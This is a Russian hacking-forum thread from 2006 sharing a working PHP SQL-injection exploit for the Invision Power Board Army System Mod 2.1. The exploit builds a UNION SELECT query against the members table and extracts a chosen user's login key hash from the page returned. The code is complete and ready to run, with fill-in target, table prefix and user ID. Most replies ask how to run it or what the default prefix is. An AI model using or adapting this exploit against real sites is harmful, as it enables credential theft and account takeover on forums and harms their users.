HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Invision Power Board Army System Mod 2.1 SQL Injection Exploit
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Invision Power Board Army System Mod 2.1 SQL Injection Exploit
  #1  
Старый 13.02.2006, 17:22
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию Invision Power Board Army System Mod 2.1 SQL Injection Exploit
Вышел новый сплойт для IPB Army System Mod 2.1, код смотрим здесь или ЗДЕСЬ


Код:
<?php
/* --------------------------- EXPLOIT ---------------------------
Invision Power Board Army System Mod 2.1 SQL Injection Exploit
Tested on: Latest version (2.1.0)
Discovered on: 06.02.2006 by Alex & fRoGGz
Credits to: SecuBox Labs

PLEASE READ THIS !
The query of the SQL Injection depends about the number of fields in the sql table
We have successfully tested the exploit on a new fresh IPB 2.1.x with Army 
System Mod 2.1 installed

IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE 
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

$target = "http://site.com/forums/"; // <--- Where ?
$prefix = "ibf_"; // <--- SQL prefix ?
$id = 1; // <--- Who ?

print_r(get_infos($target,$prefix,$id));
if(!get_infos($target,$prefix,$id)) echo "failed";

function get_infos($target,$prefix,$id) {

    $inject = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
    $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
    $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
    $inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
    $inject.= "NULL+FROM+".$prefix."members+WHERE+id=";

    $filename = $target . $inject . $id;

    $handle = fopen ($filename, "r");
        $infos = array();

        if (feof($handle)) { continue 2; }
        if ( $handle ) {
                while ( ($buffer = fgets( $handle )) )
                {
                        if ( strpos( $buffer, "<td class='pformleft' width=\"35%\">Name</td>") ) {
                                $infos['md5'] = strip_tags ( fgets( $handle) );
                break;
                        }
                }
        }

    fclose ($handle);

        if (count($infos) == 1) return $infos;
        return false;
}
?>

# milw0rm.com [2006-02-13]
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 14.02.2006, 19:44
Sprinter
Новичок
Регистрация: 12.01.2006
Сообщений: 25
С нами: 10697872

Репутация: 2
По умолчанию
Тоесть он катит для версий 2,1,*? Отличненько.
 
Ответить с цитированием

  #3  
Старый 14.02.2006, 19:52
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
С нами: 11317286

Репутация: 3876


По умолчанию
Млять, своё надо будет патчить(
 
Ответить с цитированием

  #4  
Старый 14.02.2006, 20:17
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию
какое это свое?)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 14.02.2006, 20:22
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами: 10845026

Репутация: 212
По умолчанию
локалхост)))ггг
а сёрьёзно, дай линк на своё))))
 
Ответить с цитированием

  #6  
Старый 14.02.2006, 20:36
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
С нами: 10753681

Репутация: 1
По умолчанию
не пашет...

unterminated < > operator at C:\\ipbr.pl line 1

что делать???
 
Ответить с цитированием

  #7  
Старый 14.02.2006, 20:48
TTyck
Участник форума
Регистрация: 13.11.2005
Сообщений: 199
С нами: 10785229

Репутация: 75
По умолчанию
$prefix = "ibf_";
Подскажите какой префикс по умолчанию?
 
Ответить с цитированием

  #8  
Старый 14.02.2006, 20:50
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию
Цитата:
Сообщение от ZetRoX  
не пашет...

unterminated < > operator at C:\\ipbr.pl line 1

что делать???
аффтор жжот, php скрипт через перл
 
Ответить с цитированием

  #9  
Старый 14.02.2006, 20:51
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию
Цитата:
Подскажите какой префикс по умолчанию?
ibf_
...
 
Ответить с цитированием

  #10  
Старый 15.02.2006, 03:43
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
С нами: 10997666

Репутация: 1320


По умолчанию
че-то не понял, там снова ошибка для дураков? выдает:
N*ame") ) { $infos*['m*d5'] = str*ip_tags ( fge*ts( $han*dle) ); bre*ak; } } } fclo*se ($ha*ndle); if (co*unt($info*s) == 1) retur*n $in*fos; retu*rn fal*se; } ?> # milw0rm.com [2006-02-13]
без звездочек естественно.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit Rebz Уязвимости CMS / форумов 10 04.05.2009 15:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.